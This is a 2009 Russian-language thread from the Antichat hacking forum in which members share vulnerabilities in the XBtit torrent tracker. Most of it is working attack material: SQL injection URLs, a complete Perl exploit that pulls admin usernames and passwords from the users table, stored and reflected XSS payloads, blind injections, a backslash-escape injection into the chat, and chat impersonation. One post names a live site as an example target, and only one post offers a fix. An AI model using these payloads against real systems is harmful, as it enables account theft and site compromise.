ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Сценарии/CMF/СMS
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Торрент трекер XBtit
  #1  
Старый 13.08.2009, 08:22
Аватар для Ctacok
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696

Репутация: 2221


По умолчанию Торрент трекер XBtit

Сёдня начал рыться в исходниках.
И так.
Было иследованно на:
Xbtit 2.0.0

Раскрытие путей.

Цитата:
http://target.com/index.php?page=signup&act=signup&returnto[]=
Уязвим GET параметр returnto.

PHPSESSIONID раскрытие путей.
В куках
Цитата:
PHPSESSID=!@#$%^&*(

XSS

Цитата:
http://target.com//"><script>alert(document.cookie);</script>
- Пассивная



Оло, через ошибку можно =\
Цитата:
/index.php?page=admin&user=123456+or(1,1)=(select+c ount(0),concat((select+database()+from+information _schema.tables+limit+0,1),floor(rand(0)*2))from(in formation_schema.tables)group+by+2)--+&code=1234
Цитата:
/index.php?page=users&order=flag+or(1,1)=(select+co unt(0),concat((select+database()+from+information_ schema.tables+limit+0,1),floor(rand(0)*2))from(inf ormation_schema.tables)group+by+2)--++&by=ASC
PHP код:
...
if (isset(
$_GET["order"]))
$order=htmlspecialchars($_GET["order"]);
else
$order="joined";
...
$query="select prefixcolor, suffixcolor, u.id, $udownloaded as downloaded, $uuploaded as uploaded, IF($udownloaded>0,$uuploaded/$udownloaded,0) as ratio, username, level, UNIX_TIMESTAMP(joined) AS joined,UNIX_TIMESTAMP(lastconnect) AS lastconnect, flag, flagpic, c.name as name, u.smf_fid FROM $utables INNER JOIN {$TABLE_PREFIX}users_level ul ON u.id_level=ul.id LEFT JOIN {$TABLE_PREFIX}countries c ON u.flag=c.id WHERE u.id>1 $where ORDER BY $order $by $limit"

Цитата:
/index.php?page=torrents&active=2&order=speed+or(1, 1)=(select+count(0),concat((select+database()+from +information_schema.tables+limit+0,1),floor(rand(0 )*2))from(information_schema.tables)group+by+2)--++&by=ASC
Ещё нашёл

Код:
#!/usr/bin/perl 
use LWP::Simple;
print "\n";
print "##############################################################\n";
print "# xbtit Torrent Tracker SQL INJECTION EXPLOIT                #\n";
print "# Author: Ctacok  (Russian)                                  #\n";
print "# Blog : www.Ctacok.ru                                       #\n";
print "# Special for Antichat (forum.antichat.ru) and xakep.ru      #\n";
print "# Hello HAXTA4OK, mailbrush    (Thanks)                      #\n";
print "##############################################################\n";
if (@ARGV < 2)
{
print "\n Usage: exploit.pl [host] [path] ";
print "\n EX : exploit.pl www.localhost.com /path/ \n\n";
exit;
}
$host=$ARGV[0];
$path=$ARGV[1];
$vuln = "+or(1,1)=(select+count(0),concat((select+concat(0x3a3a3a,id,0x3a,username,0x3a,password,0x3a3a3a)+from+xbtit_users+limit+1,1),floor(rand(0)*2))from(information_schema.tables)group+by+2)";
$doc = get($host.$path."index.php?page=torrents&active=2&order=speed".$vuln."--+&by=ASC");
if ($doc =~ /:::(.+):(.+):(.+):::/){
        print "\n[+] Admin id: : $1";
		print "\n[+] Admin username: $2";
		print "\n[+] Admin password: $3";
}else{
		print "\n My name is Fail, Epic Fail... \n"
}
Активная XSS:

index.php?page=usercp&do=user&action=change&uid=В аш уид. (Кароче change profile в My panel).
Меняем Avatar(Url) на:

jav ascript:alert();%00.gif
// Здесь этот пробел отфильтровал форум. Берём здесь http://ha.ckers.org/xss.html#XSS_Embedded_tab
Как бы надо хоть как javascript заменять на что-то подобное
Суть такова, что в конце обязательно нужен .gif,.jpg,.bmp или .png
Но если делать в <IMG src='javascript:alert();.gif'>
То код выполняться небудет, обычным нулл байтом прокатило

Вообшем в модуле форум (не смф, а родной Xbtit'овский) при создании темы / сообщения, XSS срабатывает


Надо что-бы торренты были открыты для публичного просмотра )

Последний раз редактировалось Ctacok; 14.06.2010 в 19:31..
 
Ответить с цитированием

  #2  
Старый 13.08.2009, 09:14
Аватар для HAXTA4OK
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210

Репутация: 2017


По умолчанию

Требуются права админа

SQL-inj

index.php?page=admin&user=2&code=8355071'&do=prune u

SQL-inj
Наврал , права пользователя нужны

index.php?page=allshout&sid=1'&edit
index.php?page=allshout&sid=1'&delete

уязвимый код :
Код:
$sid = isset($_GET["sid"])?$_GET["sid"]:0; # get shout id (sid)and set it to zero for bool

  
    $sql =  "SELECT * FROM {$TABLE_PREFIX}chat WHERE id > ".$lastID." AND id != ".$sid." ORDER BY id DESC";
пример :

Код:
http://lampmaster.dk/index.php?page=allshout&sid=1'&edit
решение проблемы:

Код:
$sid = isset($_GET["sid"])?(int)$_GET["sid"]:0; # get shout id (sid)and set it to zero for bool

  
    $sql =  "SELECT * FROM {$TABLE_PREFIX}chat WHERE id > ".$lastID." AND id != ".$sid." ORDER BY id DESC";



index.php?page=allshout&sid=1+and+substring(versio n(),1,1)=5/*&edit


Раскрытие путей
если создан хоть один топик в форуме

index.php?page=forum&action=viewforum&forumid[]=

index.php?page=forum&action=viewtopic&topicid[]=

Последний раз редактировалось HAXTA4OK; 15.08.2009 в 18:32..
 
Ответить с цитированием

  #3  
Старый 13.08.2009, 11:04
Аватар для Qwazar
Qwazar
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
Провел на форуме:
10605912

Репутация: 4693


По умолчанию

Цитата:
что то в реализации затух видать какие то фильтры там стоят
Покажи уязвимый код.
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..

Мой блог:http://qwazar.ru/.
 
Ответить с цитированием

  #4  
Старый 13.08.2009, 11:14
Аватар для HAXTA4OK
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210

Репутация: 2017


По умолчанию

Код:
$sid = isset($_GET["sid"])?$_GET["sid"]:0; # get shout id (sid)and set it to zero for bool

  
    $sql =  "SELECT * FROM {$TABLE_PREFIX}chat WHERE id > ".$lastID." AND id != ".$sid." ORDER BY id DESC";
    $conn = his_getDBConnection(); # establishes the connection to the database
    $results = mysql_query($sql, $conn);
что посмотрев его я задумался если тут уязвимость?хотя order by проходит , и в итоге дает мне 5 столбцов
 
Ответить с цитированием

  #5  
Старый 13.08.2009, 11:17
Аватар для Qwazar
Qwazar
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
Провел на форуме:
10605912

Репутация: 4693


По умолчанию

Какой запрос пытаешься передать? Посмотри фильтруется ли выше $_GET["sid"], или вообще массив $_GET.
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..

Мой блог:http://qwazar.ru/.
 
Ответить с цитированием

  #6  
Старый 13.08.2009, 11:27
Аватар для HAXTA4OK
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210

Репутация: 2017


По умолчанию

про sid
if (isset($_GET["sid"])) {
$sid = intval($_GET["sid"]); # getting shout id (sid)
но там $sid = intval($_GET["sid"]); a He $_GET['sid'] = intval($_GET["sid"]);

нету не фильтрует

3anpoc index.php?page=allshout&sid=1+order+by+6/*&delete => index.php?page=allshout&sid=1+order+by+5/*&delete =>

index.php?page=allshout&sid=1+union+select+1,2,3,4 ,5/*&delete

мне тут уже он выдает ( у меня ошибку)а на одном сайте просто кидает на индекс.пхп

Последний раз редактировалось HAXTA4OK; 13.08.2009 в 11:45..
 
Ответить с цитированием

  #7  
Старый 13.08.2009, 20:41
Аватар для Ctacok
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696

Репутация: 2221


По умолчанию

Цитата:
Сообщение от HAXTA4OK  
про sid
if (isset($_GET["sid"])) {
$sid = intval($_GET["sid"]); # getting shout id (sid)
но там $sid = intval($_GET["sid"]); a He $_GET['sid'] = intval($_GET["sid"]);

нету не фильтрует

3anpoc index.php?page=allshout&sid=1+order+by+6/*&delete => index.php?page=allshout&sid=1+order+by+5/*&delete =>

index.php?page=allshout&sid=1+union+select+1,2,3,4 ,5/*&delete

мне тут уже он выдает ( у меня ошибку)а на одном сайте просто кидает на индекс.пхп
intval()- Убирает все слова и т.п. из GET sid.
т.е. только цифры.
PS.
В асю напиши, у меня там кое где есть исчо одна бага.
 
Ответить с цитированием

  #8  
Старый 14.08.2009, 09:50
Аватар для HAXTA4OK
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210

Репутация: 2017


По умолчанию

по сути инклуд)))
при register_glodals = on
index.php?page=recover&THIS_BASEPATH='

PHP код:


           
include("$THIS_BASEPATH/include/security_code.php"); 
Qwazar глянь плиз и можно ли его реализвоать?


index.php?page=admin&user=2&code=835507&do=logview &THIS_BASEPATH=1'

PHP код:

   
    
include("$THIS_BASEPATH/include/offset.php"); 
index.php?page=viewnews&THIS_BASEPATH='

Последний раз редактировалось HAXTA4OK; 15.08.2009 в 16:19..
 
Ответить с цитированием

  #9  
Старый 16.08.2009, 20:00
Аватар для mailbrush
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию

Расскрытие путей: /ajaxchat/sendChatData.php

Уязвимый кусок кода:
PHP код:
if (!ini_get('register_globals')) {
        
extract($_POSTEXTR_SKIP);
}
$name $n# name from the form
$text $c# comment from the form
$uid $u;  # userid from the form 
Если не найден $_GET $_POST $_COOKIE n или c или u, выскакивает Notice, мол, переменная не найдена.
Код:
Notice: Undefined variable: X in [PATH]
SQL-инъекция, причем очень хитромудрая После выполнения запроса смотрим в чат и видим юзера, бд, версию.
Код:
/ajaxchat/sendChatData.php?n=123\&c=,concat_ws(0x3a,user(),database(),version()),7)/*&u=2
Если не работает GET'ом, попробуйте POST'ом. Почему? Смотрите ниже, там где постинг от другого юзера.

Уязвимый кусок кода:
PHP код:
//смотрим предыдущий код, откуда берутся переменные
//бажный мегафильтр
$name str_replace("\'","'",$name);
$name str_replace("'","\'",$name);
$text str_replace("\'","'",$text);
$text str_replace("'","\'",$text);
$text str_replace("---"," - - ",$text);

$name str_replace("---"," - - ",$name);

//сама ф-ция записи в БД
function addData($name,$text,$uid) {
  include(
"../include/settings.php");   # getting table prefix
  
$now time();
    
$sql "INSERT INTO {$TABLE_PREFIX}chat (time,name,text,uid) VALUES ('".$now."','".$name."','".$text."','".$uid."')";
    
$conn getDBConnection();
    
$results mysql_query($sql$conn);
    if (!
$results || empty($results)) {
        
# echo 'There was an error creating the entry';
        
end;
    }

Т.е. получается, что бажный фильтр экранирует кавычки в переменных $name, $text. Но это не проблема, т.к. слеш не экранируется. При запросе на сайт

Код:
/ajaxchat/sendChatData.php?n=NAME\&c=,concat_ws(0x3a,user(),database(),version()),2)/*&u=2
запрос в базу выглядит таким образом:
Код:
INSERT INTO {$TABLE_PREFIX}chat (time,name,text,uid) VALUES 

('1234567890','NAME\',',concat_ws(0x3a,user(),database(),version()),2)/*','2')
Вроде, разукрасил, как мог... Но если еще непонятно, объясню - фильтр НЕ фильтрует бекслеш, т.е. \. Если в конец поля NAME, т.е. в GET/POST - "n"" вставить бекслеш, получится, что он экранирует кавычку и текст mysql-поля NAME будет считаться до тех пор, пока не будет найдена кавычка. Она найдена - открывающая кавычка поля TEXT. Другое поле должно быть отделено запятой от предыдущего, поэтому и запятая в GET/POST поле "c". После запятой идет содержимое поля text, мы подставляем то, что нам нужно, в конкретном случае concat_ws(0x3a,user(),database(),version()). Отделяем запятой следующее поле - uid - пишем любое число, в моем случае - 2. Ну и "/*", чтобы отсечь все лишнее. PS: Поле uid не фильруется, но т.к. оно типа mediumint(9), ничего полезного из него мы не достанем.

Blind SQL-инъекция. Необходимы права админа.
Код:
/index.php?page=admin&user=2&code=134469&do=category&action=edit&id=5 and substring(version(),1)=5
Уязвимый код:
PHP код:
    case 'edit':
        if (isset(
$_GET["id"]))
          {
            
// we should get only 1 style, selected with radio ...
            
$id=max(0,$_GET["id"]);
... 
Blind SQL-инъекция. Необходимы права админа.
Код:
/index.php?page=admin&user=2&code=134469&do=style&action=edit&id=1+and+substring(version(),1)=5
Уязвимый код:
PHP код:
    case 'edit':
      if (isset(
$_GET["id"]))
        {
          
// we should get only 1 style, selected with radio ...
          
$id=max(0,$_GET["id"]);
          
$sres=get_result("SELECT style,style_url FROM {$TABLE_PREFIX}style WHERE id=$id",true);
... 
Пассивная XSS:
Код:
/index.php?page=edit&info_hash=HASHID&returnto=index.php";alert(/hello+world/);<!--
Уязвимый код:
Код:
/include/functions.php
PHP код:
function redirect($redirecturl) {
// using javascript for redirecting
// some hosting has warning enabled and this is causing
// problem withs header() redirecting...

        
print("If your browser doesn't have javascript enabled, click <a href=\"$redirecturl\"> here </a>");
        print(
"<script LANGUAGE=\"javascript\">window.location.href=\"$redirecturl\"</script>");


Код:
/edit.php
PHP код:
$link urldecode($_GET["returnto"]);
...
redirect($link); 
Постинг в чат от другого юзера:
Код:
http://127.0.0.1/dev/ajaxchat/sendChatData.php?n=NAME&c=TEXT&u=UID
Уязвимый код:
PHP код:
function addData($name,$text,$uid) {
  include(
"../include/settings.php");   # getting table prefix
  
$now time();
    
$sql "INSERT INTO {$TABLE_PREFIX}chat (time,name,text,uid) VALUES ('".$now."','".$name."','".$text."','".$uid."')";
    
$conn getDBConnection();
    
$results mysql_query($sql$conn);
    if (!
$results || empty($results)) {
        
# echo 'There was an error creating the entry';
        
end;
    } 
Если register_globals = On - GET'ом открывать, в противном случае - POST'ом.

ЗЫ: Сам не ожидал, что столько найду, напишу, о_О.

Последний раз редактировалось mailbrush; 16.08.2009 в 20:16..
 
Ответить с цитированием

  #10  
Старый 29.09.2009, 20:38
Аватар для HAXTA4OK
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210

Репутация: 2017


По умолчанию

Cоздаeм нагрузку на сервер

При register_globals = On

/index.php?GLOBALS["charset"]=

Последний раз редактировалось HAXTA4OK; 29.09.2009 в 20:40..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Накрутка рейтинга на торрент / torrent трекерах Romaxa55 Разное - Покупка, продажа, обмен 30 10.11.2009 23:29
Торрент OdaN Soft - *nix 4 29.03.2009 01:35
uptracker.net - торрент трекер Arigona Проверка на уязвимости 8 27.01.2009 20:19



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ